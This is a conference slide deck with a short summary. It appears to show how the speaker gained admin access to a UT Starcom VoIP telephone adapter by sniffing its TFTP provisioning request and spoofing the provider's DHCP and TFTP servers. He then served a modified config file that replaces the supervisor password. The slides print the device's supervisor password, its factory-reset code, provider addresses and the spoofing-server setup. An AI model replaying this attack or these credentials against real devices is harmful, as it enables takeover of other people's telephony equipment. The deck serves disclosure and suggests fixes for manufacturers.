This document summarizes a presentation about analyzing the behavior of Voice over IP (VoIP) devices. The presentation describes how the speaker was able to gain administrative access to a UT Starcom ATA device by sniffing its traffic, spoofing the TFTP and DHCP servers, and uploading a modified configuration file. It provides steps on setting up spoofing servers and uploading the modified file to change the administrator password on the device. The speaker concludes by noting other devices with similar vulnerabilities and potential solutions for manufacturers.

1. O MAIOR EVENTO DE HACKING, SEGURANÇA
E TECNOLOGIA DO BRASIL DO CONTINENTE

2. Analysing VoIP Device
Behavior
Ygor Guimarães a.k.a r0gy153

3. INTRODUCTION
16/03/2016 3

4. #whoami
Ygor Guimarães a.k.a. Rogy153
18 years old
Brasil Pentest since 2012
Skill’s
Hardware
VoIP - Asterisk, Elastix, FreeSwitch
Bash

5. ATA (ANALOG TELEPHONE ADAPTER)
16/03/2016 5

6. ATA?

7. Common Scenario

8. Common Scenario

9. Victim
Manufacturer: UT Starcom
Model Name: iAN-02EX

10. GOAL: GAIN ACCESS TO ADMIN
PAGE
16/03/2016 10

11. Just press reset button?

12. Information Gathering

13. Sniffing

14. Sniffing
1. TFTP request
• GET U53V004.00.00_UTSTARCOM-GENERAL.CFG
• 200.153.153.107Provider config file server

15. How works
TFTP
Provider
Server
GET U53V004.00.00_UTSTARCOM-GENERAL.CFG

16. Searching config file
BINGO!
• Google search

17. Looking downloaded config
file
Downloaded Config File
[...]
provision_priority=1
provision_server_address=200.162.143.2
07
provision_server_port=69
provision_http_server_address=0
[...]
upgrade_server_address=200.162.143.207
upgrade_server_port=69
[...]
factoryreset=*#322867973738
[...]
supervisor_password=3L3N2Maxcom2411
[...]
Modified Config File
[...]
provision_priority=1
provision_server_address=0
provision_server_port=69
provision_http_server_address=0
[...]
upgrade_server_address=0
upgrade_server_port=69
[...]
factoryreset=*#322867973738
[...]
supervisor_password=rogy153hasbee
nhere
[...]

18. MITM
TFTP
I am
200.153.153.107
And i have
U53V004.00.00_UTSTARCOM-GENERAL.CFG
Provider
Server

19. What we need?
DHCP server
TFTP server

20. DHCP server
root@rogy153 ~ # apt-get install
dhcp3-server
root@rogy153 ~ # vim
/etc/dhcp/dhcpd.conf

21. DHCP server
subnet 200.153.153.0 netmask 255.255.255.0 {
range 200.153.153.1 200.153.153.254;
# option routers rtr-239-0-1.example.org
# rtr-239-0-2.example.org;
}

22. DHCP server
root@rogy153 ~#ifconfig eth0 200.153.153.107 netmask
255.255.255.0

23. TFTP server
root@rogy153 ~# apt-get install
tftpd-hpa
root@rogy153 ~# vim
/etc/default/tftpd-hpa

24. TFTP server
#/etc/default/tftpd-hpa
TFTP_USERNAME="tftp"
TFTP_DIRECTORY="/utstar"
TFTP_ADDRESS="0.0.0.0:69"
TFTP_OPTIONS="--secure"

25. TFTP Test
root@rogy153:~# ls
root@rogy153:~#
root@rogy153:~# > /utstar/teste.txt
root@rogy153:~# tftp 200.153.153.207
tftp > get teste.txt
tftp > quit
root@rogy153:~#ls
teste.txt
It’s Works!

26. Uploading...

27. Uploading...

28. Authentication

29. Success!!!

30. Bonus
Other devices with same ‘feature’

31. Tools
Throwing Star LAN Tap
https://greatscottgadgets.com/throw
ingstar/
Wireshark
TFTP Server
DHCP Server

32. Solutions!?
HTTPS
XOR crypto
Filename hashing

33. Questions?

34. Contact
rogy153.blogspot.com
fb.com/ygorsza
@rogy153
ygor[at]brasilpentest[dot]com

35. Greet’s
Sl4y3r 0wn3r - slayerowner.blogspot.com
UNK-BR – unk-br.blogspot.com
SlackDummies – slackdummies.blogspot.com
M4dw0lf – m4dw0lf.wordpress.com

36. Obrigado!
#dontstophacking
ygor[at]brasilpentest[dot]com